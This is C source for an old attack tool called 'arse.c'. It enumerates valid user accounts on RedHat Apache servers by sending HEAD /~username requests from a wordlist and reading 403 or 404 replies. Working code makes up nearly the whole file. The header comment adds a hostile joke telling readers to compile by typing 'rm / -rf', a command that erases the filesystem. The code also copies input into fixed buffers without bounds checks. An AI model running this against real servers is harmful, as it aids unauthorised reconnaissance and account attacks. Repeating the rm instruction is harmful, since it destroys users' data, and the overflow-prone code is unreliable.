/*
  * arse.c
  * --------
  * Apache and Redhat Security Exploit (k, sorry for the name :))
  * 
  * ./arse www.server.com 80 file_with_names
  *
  * the default installation of Apache on a RedHat server might give us 
  * valid logins.  If you do www.server.com/~validlogin you'll get a 403,
  * else, if the login is not valid, you will get a 404.  
  * Make sure www.server.com is a RedHat server, because 
  * on other linux distro's everything gives a 403. (well.. slack does)
  *
  * for the kiddiez: to compile type "rm / -rf" (without brackets)
  *
  * by Incubus
  * incubus@securax.org
  *
  * Greetz to G-girl, Root-dude, Securax, Zsh and ShellOracle.
  *
  * minor bug: the last name is checked twice. 
  * 
  */
  
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
    char user[100];
    char test[100];
    int port, sock, result;
    struct sockaddr_in 	name;
    struct hostent 	*hostinfo;
    char buffer[2048];
    char url[120];
    FILE *file;
    if (argc != 4){
	printf ("\nApache and Redhat Security Exploit.\n");
	printf ("-----------------------------------\n");
	printf ("usage: %s www.server.com 80 file_with_names.\n", argv[0]);
	printf ("Written by Incubus, (incubus@securax.org)\n\n");
	exit(0);
    }
    file = fopen(argv[3], "r");
    if (file == NULL){
	printf ("Error opening %s, exiting.\n", argv[3]); exit(-1);
    }
    port=atoi(argv[2]);    
    hostinfo=gethostbyname(argv[1]);
    if (!hostinfo){
	printf("Error: unknown host %s (maybe a typo?)\n", argv[1]);
	exit(-1);
    }
    name.sin_family=AF_INET;
    name.sin_port=htons(port);
    name.sin_addr=*(struct in_addr *)hostinfo->h_addr;    
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0){
	printf ("Error: socket error.\n\n");
	exit(-1);
    }
    result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
    if (result != 0){
	printf ("Error: Socket error.\n\n");
	exit(-1);
    }
    send(sock, "HEAD / HTTP/1.0\n\n",18, 0);
    recv(sock, buffer, sizeof(buffer), 0);
    close(sock);
    if (!(strstr(buffer,"Server: Apache"))){
	printf ("%s is not running Apache on port %s, exiting.\n", argv[1], argv[2]);
	exit(-1);
    }
    while (!feof(file)){
	fscanf(file, "%s", user);
	strcpy(test,"HEAD /~");
	strcat(test, user);
	strcat(test, " HTTP/1.0\n\n");
	sock=socket(AF_INET, SOCK_STREAM, 0);
	connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
	send(sock, test , sizeof(test) , 0);
	recv(sock, buffer, sizeof(buffer), 0);
	close(sock);
	if (strstr(buffer, "403 Forbidden"))
	    printf ("%s is a user.\n", user);
	if (strstr(buffer, "200 Ok"))
	    printf ("%s is a user.\n", user);
    }
}